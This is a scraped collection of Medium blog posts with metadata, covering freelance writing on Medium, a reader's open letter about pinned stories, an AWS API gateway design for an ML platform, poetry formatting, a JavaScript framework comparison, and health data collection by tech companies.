Title Medium Worth Freelance WritersContent Medium Worth Freelance Writers depends goal much you’re willing invest platform Image Jason McBride Medium one exciting platform writer It’s easy publish work gatekeeper technical hurdle stopping also much easier find audience Medium traditional blog Even better want get paid work directly platform don’t sell course affiliate product — get paid based amount time people spend reading word However professional writer guard time carefully worth write Medium answer depends want get platform freelance writer making fulltime income online eight year joined Medium Partner Program 2018 ever made month Partner Program 1070 August year Last month made 533 month probably make another 500 high earner also taken long break platform health issue freelance business demand However keep coming back Medium three reason It’s fun write Every article write becomes tiny digital asset Writing Medium great business Want Write want write Medium it’s easy way make money wasting time 6 writer make 100 given month highestearning writer one earn sixfigures year Partner Program spent year writing ton article worked ass build loyal audience written ton know writer make significant money Medium could one want take lot work looking shortcut fame fortune wrong reason writing Medium excellent way earn extra money also excellent way improve writing skill meet writer editor decide writing Medium worth need plan use platform Ways Use Medium Help Career Except first month always earned least 100 Medium Even went six month without publishing anything platform dealing kidney cancer article still earning little bit money every day earn passive income Medium large enough backlist curated article publish make Partner Program much love getting paid directly Medium reason keep coming back way make money writing made much money client hired reading one post Medium ever Partner Program It’s even close freelance writer Medium let get paid build portfolio Clients see knowledge skill help writing get know even contact Another way Medium help freelancer allows build email list Building email list help grow writing business take audience matter go Medium could disappear tomorrow email list direct biggest fan next project writer Medium leveraged work get book deal sell article magazine publisher consistently put good work world people eventually take notice Medium help get noticed faster matter kind writer want Medium help take next step career strategic Changes Platform doesn’t mean Medium perfect always danger publishing platform don’t control Medium always changing Sometimes change require shift way use platform Currently Medium changing look platform tweaking story found interested succeeding doesn’t good complain always choice quit refuse adapt fade obscurity evolve platform I’ve lucky Every change Medium made since joined 2018 made easier make money However current change require adapt still believe Medium good financially creatively changed use platform Future Strategy past used two main publication Escape Motivation Weirdo Poetry build two different audience always difficult new change may impossible new strategy create new account publish poetry humor comic visual essay Weirdo Poetry using account post story writing freelancing marketing business still publish 99 work Escape Motivation suspect take long time new account ever make 100 kind short creative work write easy monetize Medium main goal account build audience experiment different form new account creative expression want make 
profitable creativity primary goal focus account continue making money helping freelancer solopreneurs small business strategy worked well past two year don’t see reason change going publishing regularly account interested new account find Get Put Medium worth freelancer Yes willing invest time building library useful content audience worth effort write However decide strategy lot different option believe anything — can’t everything succeed commit strategyTags Work Freelancing Business Creativity Writing
3,858
An Open Letter To My Favorite Writer About Pinning Stories On Your Profile Page
A humble request from a dedicated reader
I know this is going to sound weird so please don’t hold it against me, but I’m having an awful time accessing your articles. Every time I show up on your page, I notice the entire first page of stories is pinned stories that you’ve been writing over the past 6 months. These are your greatest hits. The four stories on your profile page are all pinned. The next page has four more pinned stories. The third page has four more pinned stories. I only find your newest post on the fourth page. This morning, I found your new post about adopting stray cats on the fifth page. It took me 8 minutes to get to your newest story.
I don’t mind doing this for you and will continue to wade through all your pinned posts, but I have a humble request for you today. Could you have a few fewer pinned posts so we see your latest article towards the top of your profile page? Reading your stories used to take a few minutes but now it’s taking me 8 minutes to even get to your latest post. I have to stumble through all of your greatest hits before I find what I’m looking for. Only after the 8 minutes do I get to your post and spend another 7 minutes reading it. What used to take me 7 minutes takes closer to 15 these days. I’m asking for your assistance and come to you with the simplest request: to put your latest story on page 2 or at least page 3 of your profile. If you can help me cut down the searching time for your newest post by half, I would be ever so grateful.
An earnest plea to get some of my time back
Don’t get me wrong. I have nothing against your 16 pinned posts, but I just would like to get in, read and get out. Currently, it feels like I need to plan a trip to the city known as your profile page. I have no Google map for how to get there and little instruction when I do arrive. I go around in circles searching through publication dates to find your most recent post. Pinning a few fewer posts upfront will help me get to what I’m looking for sooner.
I’m humbly requesting that you give me a little bit more of my time back. Every 4 minutes I save finding your most recent post allows me to read someone else’s post or even one of your old posts. I mean no offense or harm. I am no hater or troll. I come with genuine gratitude and an earnest plea. Thank you for understanding, and I look forward to seeing your latest post soon. I hope I won’t have to spend the regular 8 minutes to find it by going through all the pinned posts.
Your reader and fan,
Pinned Out
p.s. This is in no way a bribe but I just donated another $20 to your KoFi account. You can use it for coffee or to pay for your Medium subscription or for groceries. I ask nothing in return. You don’t have to move your latest story to the top of the profile page, but if you did, I would be forever grateful and there may be more KoFi donations coming your way.
https://medium.com/the-haven/an-open-letter-to-my-favorite-writer-about-pinning-stories-on-your-profile-page-666ac9cee9d4
['Vishnu S Virtues']
2020-12-09 22:29:13.236000+00:00
['Language', 'Creativity', 'Psychology', 'Culture', 'Lifestyle']
Title Open Letter Favorite Writer Pinning Stories Profile PageContent humble request dedicated reader know going sound weird please don’t hold I’m awful time accessing article Every time show page notice entire first page story pinned story you’ve writing past 6 month greatest hit four story profile page pinned next page four pinned story third page four pinned story find newest post fourth page morning found new post adopting stray cat fifth page took 8 minute get newest story don’t mind continue wade pinned post humble request today le pinned post see latest article towards top profile page Reading story used take minute it’s taking 8 minute even get latest post stumble greatest hit find I’m looking 8 minute get post spend another 7 minute reading used take 7 minute take closer 15 day I’m asking assistance come simple request put latest story page 2 least page 3 profile help cut searching time newest post half would ever grateful earnest plea get time back Don’t get wrong nothing 16 pinned post would like get read get Currently feel like need plan trip city known profile page google map get little instruction go around circle searching publication date find recent post Posting le pinned post upfront help get I’m looking sooner I’m humbly requesting give little bit time back 4 minute save finding recent post allows read someone else’s post even one old post mean offense harm hater troll come genuine gratitude earnest plea Thank understanding look forward seeing latest post soon hope won’t spend regular 8 minute find going pinned post reader fan Pinned p way bribe donated another 20 KoFi account use coffee pay Medium subscription grocery ask nothing return don’t move latest story top profile page would forever grateful may KoFi donation coming wayTags Language Creativity Psychology Culture Lifestyle
3,859
Implementation of the API Gateway Layer for a Machine Learning Platform on AWS
After defining some of the main concepts in the API world in the previous article, I will talk about the different ways of deploying an API Gateway for the Machine Learning platform. In this article, I will use the infrastructure and software layers designed in one of my previous articles. You may want to go through it to have a clearer view of the platform’s architecture before proceeding. As a reminder, the scope of this series of articles is the model serving layer of the ML platform’s framework layer. In other words, its “API Gateway”.
Scope of this series of articles, by the author
Now let’s start designing! A question may arise: if we are in an AWS environment, why not just use the fully managed and serverless AWS API Gateway? You never know if you don’t try. So let’s try this!
1 | Just the AWS managed API Gateway
Here’s how AWS API Gateway could be placed in front of an EKS cluster.
AWS API Gateway for the API Gateway layer, by the author
First of all, AWS API Gateway is a fully managed service and runs in its own VPC, so we don’t know what’s happening behind the scenes or any details about the infrastructure. Thanks to the AWS documentation, we know that we can use API Gateway private integrations¹ to get the traffic from the API Gateway’s VPC to our VPC using an API Gateway VpcLink resource². The private VpcLink is a great way to provide access to HTTP(S) resources within our VPC without exposing them directly to the public internet. But that’s not all: the VpcLink directs the traffic to a Network Load Balancer (NLB), so the user is responsible for creating an NLB which serves the traffic to the EKS cluster. With the support of NLBs in Kubernetes 1.9+, we can create a Kubernetes Service of type LoadBalancer with an annotation indicating that it’s a Network Load Balancer³.
That would be a correct setup for the AWS API Gateway on EKS, and we could also benefit from WAF support for the managed API Gateway. The problem with this setup is that we have the power of an API Gateway, but it’s far away from our cluster and our services. If we want to use a specific deployment strategy for each service, it would be better if this were done very close to the service (like in the service’s definition itself!).
2 | API Gateway closer to our ML models!
Here’s another way of doing things. Design components: AWS API Gateway + NLB + Ambassador API Gateway.
AWS API Gateway combined with Ambassador for the API Gateway layer, by the author
In this setup, we put an open-source API Gateway solution closer to our services. I will talk in detail about Ambassador in a future article. For now, let’s just say it’s a powerful open-source API/Ingress Gateway for our ML platform that brings the API Gateway’s features closer to our models. So do we really need the AWS API Gateway? Not really… One downside, though: we will certainly lose the WAF advantages if we don’t use the AWS API Gateway. But maybe we can optimize this further!
3 | Eliminate the AWS API Gateway!
So let’s eliminate the AWS API Gateway. Design components: NLB in public subnet + Ambassador API Gateway.
Public AWS NLB combined with Ambassador for the API Gateway layer, by the author
We just need to put the NLB in a public subnet so that we can receive the public traffic. However, an NLB doesn’t understand HTTP/HTTP(S) traffic: it allows only TCP traffic, offers no HTTPS offloading, and has none of the nice OSI layer 7 features of the Application Load Balancer (ALB). Plus, with an NLB, we still can’t have the advantages of WAF.
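Before looking at the final design, here is a rough, hypothetical sketch of two of the pieces discussed so far: a Service of type LoadBalancer that provisions an NLB in front of the Ambassador pods, and an Ambassador Mapping routing a URL prefix to a model-serving Service. The NLB annotation is standard Kubernetes-on-AWS behaviour; the Ambassador resource is only a generic example of its CRD style (the article leaves Ambassador details to a future post), and every name, namespace, label and port here is invented.

```yaml
# Service of type LoadBalancer fronting the Ambassador pods.
# The annotation asks the AWS cloud provider for an NLB instead of a classic ELB;
# public vs. private placement is assumed to be handled by the subnet configuration.
apiVersion: v1
kind: Service
metadata:
  name: ambassador
  annotations:
    service.beta.kubernetes.io/aws-load-balancer-type: "nlb"
spec:
  type: LoadBalancer
  selector:
    service: ambassador          # assumed label on the Ambassador pods
  ports:
    - port: 80
      targetPort: 8080
---
# Hypothetical Ambassador Mapping: routes a URL prefix to a model-serving Service.
apiVersion: getambassador.io/v2
kind: Mapping
metadata:
  name: churn-model
  namespace: ml-serving
spec:
  prefix: /models/churn/
  service: churn-model.ml-serving:9000
```

The ALB, WAF and Route53 (or Global Accelerator) pieces of the final design sit in front of this, outside the cluster.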
4 | Our final design!
So, here’s the final setup. Design components: ALB in public subnet + WAF + NLB in private subnet + Ambassador API Gateway.
Final setup for the API Gateway layer, by the author
As WAF integrates well with the Application Load Balancer (ALB), why not put an ALB in front of the NLB? We can also move that NLB back to its private subnet. One thing to pay attention to, though: in this setup, the AWS ALB cannot be assigned a static public IP address. So, after some time, the ALB’s IP changes and we lose access to the platform. Two possible solutions:
1. Summon the almighty Amazon Route53: we need to use the DNS name of the ALB instead of its changing IP addresses. To do this:
a. We have to migrate our nameservers to Route53 if that’s not already the case.
b. Pay attention to mail redirection: Route53 only handles DNS and does not redirect emails. A solution for this could be to use an MX record and a mail server (like Amazon WorkMail).
2. Use AWS Global Accelerator: we never get bored with Amazon. Recently, Amazon launched this new service, which could easily solve such a problem. A Global Accelerator with 2 fixed IPs and a unique DNS name will receive the traffic and direct it to an endpoint group containing our ALB. Here’s a detailed guide on how to use this new feature.
Conclusion
In this article, I tried to study different deployments of an API Gateway for the Machine Learning platform. Starting from simply using an AWS API Gateway, I tried to find an optimal setup with maximum use of advanced AWS features like WAF. In the next article, I will discuss Ambassador in detail and the various concepts behind it. If you have any questions, please reach out to me on LinkedIn.
[1] https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-private-integration.html
[2] https://docs.aws.amazon.com/apigateway/api-reference/resource/vpc-link/
[3] https://kubernetes.io/docs/concepts/services-networking/service/#aws-nlb-support
https://medium.com/swlh/implementation-of-the-api-gateway-layer-for-a-machine-learning-platform-on-aws-589381258391
['Salah Rekik']
2020-11-19 17:33:26.913000+00:00
['Machine Learning', 'Api Gateway', 'AWS', 'Technology', 'Cloud Computing']
Title Implementation API Gateway Layer Machine Learning Platform AWSContent defining main concept API world previous article talk different way deploying API Gateway Machine Learning platform article use infrastructure software layer designed one previous article may want go clearer view platform’s architecture proceeding reminder scope series article model serving layer ML platform’s framework layer word “API Gateway” Scope series article author let’s start designing question may arise AWS environment use fully managed serverless AWS API Gateway never know don’t try let’s try 1 AWS managed API Gateway Here’s AWS API Gateway could placed front EKS cluster AWS API Gateway API Gateway layer author First AWS API Gateway fully managed service run VPC don’t know what’s happening scene detail infrastructure Thanks AWS documentation know use API Gateway private integrations¹ get traffic API Gateway’s VPC VPC using API Gateway resource VpcLink² Private VpcLink great way provide access HTTPS resource within VPC without exposing directly public internet that’s VpcLink direct traffic Network Load Balancer NLB user responsible creating NLB serf traffic EKS cluster support NLB Kubernetes 19 create Kubernetes service type LoadBalancer annotation indicating It’s Network load balancer³ would correct setup AWS API Gateway EKS could well benefit WAF support managed API Gateway problem setup power API Gateway it’s far away cluster service want use specific deployment strategy service would great done close service like service’s definition 2 API Gateway closer ML model Here’s another way thing Design component AWS API Gateway NLB Ambassador API Gateway AWS API Gateway Combined Ambassador API Gateway layer author setup put opensource API Gateway solution closer service talk detail Ambassador future article let’s say it’s powerful opensource APIIngress Gateway ML platform brings API Gateway’s feature closer model really need AWS API Gateway really… One downside though lose WAF advantage sure don’t use AWS API Gateway maybe optimize 3 Eliminate AWS API Gateway let’s eliminate AWS API Gateway Design component NLB public subnet Ambassador API Gateway Public AWS NLB Combined Ambassador API Gateway layer author need put NLB public subnet receive public traffic However NLB doesn’t understand HTTPHTTPs traffic allows TCP traffic HTTPS offloading none nice OSI’s layer 7 feature Application Load Balancer ALB Plus NLB still can’t advantage WAF 4 final design here’s final setup Design component ALB public subnet WAF NLB private subnet Ambassador API Gateway Final setup API Gateway layer author WAF integrates well Application Load Balancer ALB get ALB front NLB get NLB back private subnet well One thing pay attention though setup AWS ALB cannot assigned static public IP address time ALB’s IP change lose access platform Two possible solution 1 Summon almighty Amazon Route53 need use DNS name ALB instead changing IP address migrate nameservers Route53 it’s already case b Pay attention mail redirection Route53 DNS resolver redirect email solution could use MX record mail server like Amazon WorkMail 2 Use AWS Global Accelerator never get bored Amazon Recently Amazon launched new service could easily solve problem global accelerator 2 fixed IPs unique DNS name receive traffic direct endpoint group containing ALB Here’s detailed guide use new feature Conclusion article tried study different deployment API Gateway Machine Learning platform Starting simply using AWS API Gateway tried find optimal setup maximum use AWS advanced 
feature like WAF next article discus detail Ambassador various concept behind existence question please reach LinkedIn 1 httpsdocsawsamazoncomapigatewaylatestdeveloperguidesetupprivateintegrationhtml 2 httpsdocsawsamazoncomapigatewayapireferenceresourcevpclink 3 httpskubernetesiodocsconceptsservicesnetworkingserviceawsnlbsupportTags Machine Learning Api Gateway AWS Technology Cloud Computing
3,860
A Comprehensive Guide To Publishing Poetry On Medium
A Comprehensive Guide To Publishing Poetry On Medium Best Practices, Tips & Tricks, and What Not To Do Photo by NordWood Themes on Unsplash This is for anyone who publishes poetry or plans to, on Medium. Offline poetry is something different. The formatting options and creative iconography are endless. In our journals or on our typewriters, or even in a document, we can use spacing for emphasis. We can freely indent on a piece of paper the exact amount we think is necessary to tell a small part of the story, without using more words. But this is Medium. When it comes to poetry on Medium, there aren’t many formatting options and I know you may think this is an odd thing to say, but I think that’s a good thing. A site like this is visually pleasing because of its consistency. Even though we are all different as writers, the limited formatting options make the screen pretty similar no matter who you are reading. Poets don’t like this. Poets on Medium try to come up with ways to use formatting to enhance their work, but the truth is, there isn’t much you can do. And isn’t it a better thing that the full breadth of power has to come from our words on here? I think it is. Would I like an easier way to indent once in a while? Actually, no, but I bet some would. But we can only work with the options we are given. Part of my goal in writing this is selfish. I edit and publish so much poetry between Assemblage and Loose Words, that I wanted to give an overview of the errors I see the most. And some of these things aren’t errors so much as oversights or just something missed when you are new to the platform. Either way, it will help you as much as it will help me. Hopefully more.
https://medium.com/loose-words/a-comprehensive-guide-to-publishing-poetry-on-medium-ae2535e29b43
['Jonathan Greene']
2020-05-27 12:24:25.524000+00:00
['Guides And Tutorials', 'Poetry', 'Creativity', 'Writing', 'Poetry On Medium']
Title Comprehensive Guide Publishing Poetry MediumContent Comprehensive Guide Publishing Poetry Medium Best Practices Tips Tricks Photo NordWood Themes Unsplash anyone publishes poetry plan Medium Offline poetry something different formatting option creative iconography endless journal typewriter even document use spacing emphasis freely indent piece paper exact amount think necessary tell small part story without using word Medium come poetry Medium aren’t many formatting option know may think odd thing say think that’s good thing site like visually pleasing consistency Even though different writer limited formatting option make screen pretty similar matter reading Poets don’t like Poets Medium try come way use formatting enhance work truth isn’t much isn’t better thing full breadth power come word think Would like easier way indent Actually bet would work option given Part goal writing selfish edit publish much poetry Assemblage Loose Words wanted give overview error see thing aren’t error much oversight something missed new platform Either way help much help Hopefully moreTags Guides Tutorials Poetry Creativity Writing Poetry Medium
3,861
Angular vs. React vs. Vue
Angular vs. React vs. Vue: Spot the Difference
Comparing these three frameworks (Angular versus React versus Vue) will give you a clear perspective on which one best fits your project requirements. When you have an important project with several constraints, you need a comprehensive understanding of these technologies so you can choose the right framework. That’s the basis of this article: to detail the essential factors for each framework and to help you pick the right one among them.
1. Angular vs. React vs. Vue: Popularity
According to the 2019 Stack Overflow survey, React is the most desired framework (74.5% of developers preferring it), and Vue is right behind it with 73.6% of developers embracing it. React and Vue have a similar number of users. Angular’s user numbers aren’t what they once were, but, even so, more than 50% of users still love Angular. Google Trends also reflects the popularity of Angular, React, and Vue among developers: by that measure, React is the most popular framework, followed by Angular and Vue. React easily grabs the attention of developers because of its well-built and secure structure. There’s no denying that Angular and React are used by big names in the software industry: Google uses Angular for its projects, whereas brands like Airbnb, Dropbox, Facebook, WhatsApp, and Netflix are keen on React for development.
2. Angular vs. React vs. Vue: Performance
Performance is one of the most important considerations for a front-end developer, whether you choose Angular, React, Vue, or any other framework. To judge it, you need to understand how each framework updates the UI. The DOM is effectively the UI these frameworks manipulate: React and Angular take different approaches to updating it, but Vue is the one that brings out the best result.
Angular. The good: Angular is one of the most popular JavaScript frameworks; it works with the real DOM, and it’s a strong option for single-page applications because of the coherent way it applies updates. Apart from that, Angular offers two-way data binding, which replicates changes from the model into the views in a safe, efficient, and automatic way. Liability: because the framework ships with so many features, performance can slow down in heavy applications.
React. The good: React is a front-end library that uses a Virtual DOM to improve performance for applications of any size that require frequent content updates, such as Instagram. React is built on one-directional data flow, which gives you better control over the project. Liability: React changes and develops constantly, demanding regularly upgraded, skilled programmers, so sometimes tech giants are not comfortable working with it.
Vue. The good: being the youngest member, Vue has its perks: it didn’t have to deal with the issues that arose earlier in Angular and React. Vue provides high performance and efficient memory allocation along with its enhanced features. Liability: Vue has the smallest community support because it’s the newest member of the JavaScript family.
3. Angular vs React vs Vue: Top Use Cases for web development
1. Angular: Google, the creator of Angular, actively uses it in its AdWords application to maximise performance. Famous web resources that utilize Angular include Lego, PayPal, Nike, Weather.com, and The Guardian.
2. React: React was created at Facebook, which still uses it actively across its products. The list of React users includes Instagram, Twitter, WhatsApp, and WordPress as well.
3. Vue.js: Vue doesn’t have strong corporate allies implementing its products the way Angular and React do. Still, in a short span, popular brands such as GitLab, 9Gag, Nintendo, and Grammarly have adopted Vue due to its flexibility.
4. Angular vs React vs Vue: Framework size
1. Angular (around 500 KB): Angular ships with a wide range of features, from templates to testing utilities. If your next project is a large-scale, feature-rich application, then Angular is the one for you.
2. React (around 100 KB): React is a good fit for modern web development because, with React, you don’t have to carry a big spectrum of libraries.
3. Vue (around 65 KB): given the size of the Vue framework and library, it’s suitable for lightweight applications; for complex applications you should go with Angular.
5. Angular vs React vs Vue: Learning curve
The learning curve describes how easily developers can learn to write code with a specific framework. It’s time for us to understand the learning curve of each one.
1. Vue: among these three frameworks, Vue.js has the easiest learning curve, because it stays closest to JavaScript basics and HTML. Getting started can be as easy as adding an import to your HTML. However, as you create a more complex application, it starts to get complicated; to tackle the complexity you should use .vue files for the project.
2. React: React.js has a medium-to-steep learning curve compared to Angular and Vue. React has an “everything is JavaScript” strategy. However, two elements still make the learning curve steeper: ES6 syntax, which fits React well although it’s complex for beginners, and JSX, a mixture of JavaScript and HTML that confuses a lot of users because it looks like HTML but works like JavaScript.
3. Angular: the use of TypeScript gives Angular the steepest learning curve of the three. The components, syntax, and modules also look different from what you may be used to. Its powerful features, though, help Angular developers build applications that follow consistent coding patterns.
6. Angular vs React vs Vue: Scalability
In front-end development, scalability often refers to the ability to keep adding functionality: applications must grow in size and complexity, and the development platform needs to support that growth. The developer community is consistent in saying that both Angular and React are well suited to building scalable applications. Angular focuses on scalability with its modular development structure, while React takes a component-based approach. However, in terms of scalability, Vue lags behind, due to its template-based syntax; as you might know, templates do not scale to large applications as well as JavaScript components do.
The Choice is Yours
There is no doubt that all three frameworks have their perks and downsides. Choosing the best one of these three frameworks entirely depends on the requirements of your project. For instance, if you want to build a large application, then Angular is the one for you, provided you’re comfortable with TypeScript. Otherwise, React is also suitable for large apps. However, if you like adventure and want to experiment with something newfangled and promising, then Vue.js is your framework. I hope this comparison of Angular vs React vs Vue helps you pick the best JavaScript framework for your future development project.
https://medium.com/swlh/angular-vs-react-vs-vue-802a7c5f7e50
['Nelly Nelson']
2020-11-02 14:33:13.117000+00:00
['Angular', 'Programming', 'React', 'JavaScript', 'Vuejs']
Title Angular v React v VueContent Angular v React v Vue Spot Difference comparison three framework Angular versus React versus Vue help clear perspective regarding perfect framework per project requirement important project several bottleneck require comprehensive understanding technology choose apt framework That’s basis article detail essential factor framework help pick right one among 1 Angular v React v Vue Popularity According 2019 Stack Overflow survey React desired framework 745 developer preferring Vue right behind 736 developer embracing React Vue similar number user number user Angular isn’t even 50 user still love Angular Google Trends dictate popularity Angular React Vue among developer per Google statistic React popular framework followed Angular Vue React easily grab attention developer wellbuilt secure structure Although there’s denial Angular React used big name software industry Google us Angular project whereas brand like Airbnb Dropbox Facebook WhatsApp Netflix keen React development 2 Angular v React v Vue Performance Performance considered prominent aspect frontend developer development whether choose Angular React Vue framework determine need understand performance Let help known fact DOM seen UI framework It’s vital fact React Angular take different method modernize HTML file Vue one brings best result Angular good Angular popular framework JavaScript practice real DOM it’s best option singlepageapplications due coherent update Apart Angular go TwoWay Data binding process recreates change Model view safe efficient automatic method Liability Due several feature framework translation heavy application slows performance React Goods React frontend library applies Virtual DOM enhance performance size application require frequent content upgradation Instagram base React singledirection data flow better authority project Liability constant change development React demand upgraded skilled programmer regularly sometimes tech giant comfortable working React Vue Goods youngest member Vue perk Vue doesn’t need deal issue earlier arose Angular React Vuejs development company provides high performance memory allocation enhanced feature Liability Vue smallest community support it’s novice member JavaScript family 3 Angular v React v Vue Top Use Cases web development Angular Angular actively used AdWords application maximizing performance Google founder famous web resource utilize Angular Lego PayPal Nike Weathercom Guardian 2 React specifically designed Facebook still us React actively various product creation list React user go Instagram Twitter Whatsapp WordPress well 3 Vuejs Vue doesn’t strong ally implement product like Angular React Although short span popular brand GitLab 9Gag Nintendo Grammarly associated Vue due flexibility 4 Angular v React v Vue Framework size Angular around 500 KB Angular development wide range feature enables developer create template test utility next project want develop largescale feature application Angular one 2 React around 100 KB React right framework modern web development React development don’t worry big spectrum library 3 Vue around 65 KB per size Vue framework library it’s suitable lightweight application complex application need go Angular development 5 Angular v React v Vue Learning curve learning curve defined capability user write code specific programming language It’s time u understand learning curve framework Vue Among three framework Vuejs easiest learning curve reason it’s nearest JavaScript basic HTML consider start task easy 
adding import HTML However create complex application start get complicated tackle complexity use vue file project 2 React learning curve Reactjs medium steep learning curve compared Angular Vue React “everything JavaScript” strategy However still two essential element make learning curve steeper ES6 Syntax syncs perfectly react although it’s complex beginner React us JSX syntax mixture JavaScript HTML confuses lot user form image HTML work like JavaScript 3 Angular use TypeScript make learning curve Angular steepest among three framework Also component syntax module look different used Although powerful feature help Angular developer build application following certain coding pattern 6 Angular v React v Vue Scalability Concerning frontend development scalability often relates ability maintain expanding functionality mean application must increase size complexity development platform need support extension community developers’ consistent Angular React best task it’s building scalable application Angular focus scalability modular development composition React obtains go componentbased method result However term scalability Vue way much behind due templatebased syntax might know template go along large application much JavaScript component Choice doubt three framework perk downside Choosing best one three framework entirely depends requirement project instance case want large application Angular development one course you’re satisfied TypeScript Otherwise React also suitable large apps However like adventure want experiment something newfangled promising Vuejs framework hope comparison Angular Vs React Vs Vue assist pick best framework JavaScript future development projectTags Angular Programming React JavaScript Vuejs
3,862
To Be or Not To Be (2020)
https://medium.com/merzazine/to-be-or-not-to-be-2020-3a2f194ae0f
['Vlad Alex', 'Merzmensch']
2020-11-20 11:03:32.338000+00:00
['Videos', 'Artificial Intelligence', 'Music', 'Art', 'Culture']
Title 2020Content Get newsletter signing create Medium account don’t already one Review Privacy Policy information privacy practice Check inbox Medium sent email complete subscriptionTags Videos Artificial Intelligence Music Art Culture
3,863
VJ Loop | RGB Plasmas
This blog takes the broadest conception of sound design possible, including visual effects, because audio likes video. Over 90,000 views annually.
https://medium.com/sound-and-design/vj-loop-rgbplasmas-424755ae248b
["Michael 'Myk Eff' Filimowicz"]
2020-12-29 02:26:36.212000+00:00
['Design', 'Flair', 'Technology', 'Creativity', 'Art']
Title VJ Loop RGB PlasmasContent blog take broadest conception sound design possible including visual effect audio like video 90000 view annually FollowTags Design Flair Technology Creativity Art
3,864
Here’s Why We Need Health Data Collection
Opinion Here’s Why We Need Health Data Collection Tech can enable valuable experiences with your health data Image by Lukas on Unsplash Our data is constantly collected, from YouTube history to calendar reminders to daily workouts, all possible due to rapid technological growth. According to the National Center for Biotechnology Information, 58% of U.S. cellphone users have downloaded a health-related app onto their devices, but an even greater percentage already had pre-installed software that saved health data (Krebs & Duncan, 2015). Your data, combined with millions and even billions of other people’s, creates big data, or incredibly large datasets. Over time, methods of data collection have evolved, paralleling the developments in science and technology that have allowed companies to harness massive datasets shaping the modern products at our fingertips. As technology becomes an even stronger influence in our daily lives, it is imperative to understand the effects of this kind of data collection from the technological lens and consider multiple perspectives within it. Image by James on Unsplash A prime stakeholder in the debate of health data collection is undoubtedly major technology companies, namely Apple, Amazon, Facebook, Google, and Microsoft. These companies see healthcare as a brilliant but somewhat untapped opportunity to expand innovation and spur economic growth. Jia Low, an author at TechHQ, an independent current technology and business news site, examines why these companies are eager for health data. She discusses that in 2019, Google partnered with Ascension, one of the largest healthcare providers in America, and acquired FitBit. Both of these sources accumulated heaps of patient records from around the world. With this data, Google claims it wants to aid doctors and hospitals in managing their patients more effectively and quickly via electronic health records (EHRs), which make up an astounding 80% of health records today. Amazon is a strong competitor in cloud storage, and its 2018 purchase of the online prescription service PillPack signals its push to target healthcare. The wealthiest tech giant is Apple, which puts privacy at its forefront. Apple is investing in users’ health data to make its Health platform a seamless, more reliable “middleman” in personal health management. Portable devices like the Watch and iPhone (both of which teem with health apps and features) have had positive impacts. Low cites that in 2019, the Watch detected a biker’s severe fall and contacted 911, thus saving his life. Mark Zastrow, a well-regarded writer from the prestigious peer-reviewed Nature scientific journal, covers Apple and Google’s recent collaboration on their joint COVID-19 contact tracing app that will provide more accurate feedback on infected people and notifications for those who came into contact with someone who tested positively. He points out that together, they have solved many of the privacy and efficiency issues of prior methods by implementing encrypted keys and eliminating access to personally-identifying data. Both Low and Zastrow agree that with appropriate privacy measures — encryption, pseudonyms, on-board processing, strong algorithms, and the like — technology companies have just intentions and share a goal of inventing for the betterment of society. It is clear that technology companies provide new innovations targeted to help manage the health of their users, but it is crucial to investigate how users incorporate them into their lives. 
According to a study by Rock Health from 2015 to 2018 on 4,000 U.S. adult respondents, users have adopted these tools at a record rate: in 2018, 89% of those surveyed used one or more health tools on their devices, an increase from 80% in 2015 and proof that user traction has improved. Authors Sean Day and Megan Zweig from the nationally-recognized technology and health funding company Rock Health construct their argument by discussing the common means through which data is collected: live video telemedicine, wearables, mobile tracking, online reviews, and online health information. In 2018, wearable use began shifting more towards managing health conditions and diagnoses rather than tracking fitness. Additionally, the authors note positive impact of health data collection by reporting that users rated the tools an average of 4.1 out of 5 stars, a high performance. Image by Daria on Unsplash A second way to explore users’ opinions on technology companies handling their health data is trust levels. Lance Lambert, a graduate from Duke University and the University of Cincinnati working at Fortune as a data analyst, reports on a study conducted by Fortune that surveyed 1,267 randomly selected U.S. adults. Lambert first describes that many respondents liked health tracking apps and devices, because it was “illuminating” to “see [their lives] told by the minute.” He clarifies that unfortunately, many users are unaware that their data is stored; even though they technically provide consent before using health data collection apps, they often disregard the “fine print.” It was found that 40% of the respondents are fully willing to have their data utilized by Amazon and Apple, with smaller percentages for Google and Facebook. Interestingly, this demonstrates that many people are in a paradox: they utilize digital health data tools widely and regularly but are also wary of technology companies using that data to their, and potentially the public’s, benefit. Image by Campaign Creators on Unsplash A third role involved heavily is healthcare professionals, specifically doctors. James Gaston, the senior director of data modeling at Healthcare Information and Management Systems Society, says, “[Our cultural definition of healthcare] is moving away from a brick-and-mortar centric event to a broader, patient-centric continuum encompassing lifestyle, geography, social determinants of health and fitness data in addition to traditional healthcare episodic data.” The sheer volume of health data being collected implies that it accurately represents its target audience, significantly improving a more time-consuming, costly, and ineffective policy of direct doctor-patient communication. He asserts that if limited data is collected by only doctors and analyzed at too granular of a level, patterns will be difficult to spot and consequently, innovation will decrease. Medical data from users’ devices combined with doctor-specific sessions incorporates a large array of different types of data — from search queries, app statistics, and wearable outputs to environmental factors and individual lifestyles — and thus provides more informative results. This process of leveraging big data and technology to assist individualized healthcare without a doctor physically present is called telemedicine. 
Constant collection streaming through patients’ devices, as demonstrated with Apple and Samsung users, can allow doctors, families, and users themselves to consistently track overall health and improve care, says Valarie Romero, a telemedicine professor at The University of Arizona. Other scholars disagree with her. Gina Neff, a senior research fellow and Associate Professor in the Department of Sociology at the University of Oxford, quotes an anonymous physician in her survey: “I don’t need more data; I need more resources.” She explains that big data is valued in various ways by different people, so some professionals believe data-intensive solutions take excessive time away from providing quality care. Neff claims that creating healthcare solutions built on vast data collection does not account for multiple viewpoints well. It is evident that technology companies, users, and healthcare professionals have different stances on the topic of digital health data collection through devices. While technology companies have a favorable outlook as they work to develop new products that can be beneficial, citizens have varying levels of trust that their data is used for straightforward purposes. In the healthcare industry, some propose that data collection increases efficiency, accuracy, and scalability, and others say it undermines the abilities of the professionals themselves. Cumulatively, these perspectives suggest that health data collection from devices — when active consent, privacy, and personal choice are ensured — is generally positive for both the public and technology companies.
https://towardsdatascience.com/heres-why-we-need-health-data-collection-139cc2aea3ff
['Asmi Kumar']
2020-12-22 14:18:04.439000+00:00
['Data', 'Health', 'Technology', 'People', 'Education']
